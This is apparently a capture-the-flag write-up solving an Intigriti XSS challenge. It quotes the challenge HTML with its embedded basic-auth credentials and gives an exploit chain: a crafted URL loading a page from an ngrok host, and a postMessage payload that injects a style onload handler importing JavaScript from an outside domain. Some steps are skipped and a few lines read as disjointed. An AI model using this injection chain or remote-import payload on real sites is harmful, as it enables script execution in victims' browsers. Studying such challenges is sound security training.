- Category: Web
- Impact: Medium
- Solves: 12
Find a way to execute alert(document.domain) on the challenge page.
The solution:
- should leverage a cross site scripting vulnerability on this domain;
- should execute
alert(document.domain); - should not be self-XSS or related to MiTM attacks;
- should not use another challenge on the
intigriti.iodomain; - should require no user interaction.
We have a web game challenge where we can frantically spam our spacebar key:
<html>
<head>
<link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css">
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Lato">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
<title>Test Your Race Condition!</title>
</head>
<body style="padding:40px;">
<h1>Test Your Race Condition!</h1>
<section>Welcome to this gaming page! How fast are you in all games?</section><br>
<section>
We currently have just one game but more are in development. Check out the first game:
<a id="gameLink" href="https://admin:[email protected]/private/play.html?gameId=/challenge/game_barspacer.html">BarSpacer</a>!
</section>
<br>
<section>
If you are a developer, please check out <a href="/challenge/docs.html">the docs</a> for instructions on how to integrate your games with this website.
</section><br>
<section id="debug" style="display:none;">Get our server side code here (PW: intigriti):<a id="codeLink" href="/code.zip">code</a></section>
<script>
// our backend guys wanted to secure this but who cares about bots and hackers just add this in, until they complain
if (decodeURIComponent(document.URL).indexOf('debug=true') !== -1) {
codeLink.href = 'https://admin:debug@' + location.host + codeLink.pathname;
debug.style.display = null;
}
gameLink.href = 'https://admin:debug@' + location.host + gameLink.pathname + '?' + gameLink.href.split('?')[1];
</script>
</body>
</html>A wget command won't produce anything interesting, except for the Sorry, this app is optimized for Chromium based browser. message.
We can take inspiration from the title, previous Intigriti challenges and some fuzzing to find a way to get there quickly.
The given errors are fairly self-explanatory so we won't dwell much on them:
https://admin:debug:%3fdebug=true&gameId=%2f%2fip.ngrok-free.app%2Fpoc.htm&1%[email protected]/private/play.html?gameId=/challenge/game_debug.html#@challenge-0424.intigriti.io/private/play.html?
The top.postMessage method safely enables cross-origin communication between objects, between a page and a pop-up that it spawned or between a page and an iframe embedded within it.
Therefore we launch our Ngrok-python wrapper followed by python -m http.server 1234 command to serve our payload (having regard to the above code) and get the alert popup:
<body><script>top.postMessage({nextGameId:"//challenge-0424.intigriti.io/challenge/game_debug.html#",action:"gotoNextGame"},"*");top.postMessage({nextGameId:"%</textarea><style/onload=import(/\\nj.rs/)>",action:"gotoNextGame"},"*");</script></body>Avoid using JavaScript.
A great way to brush up our classics! (Confer https://twitter.com/intigriti/status/1780264966752272625 for other great solutions)
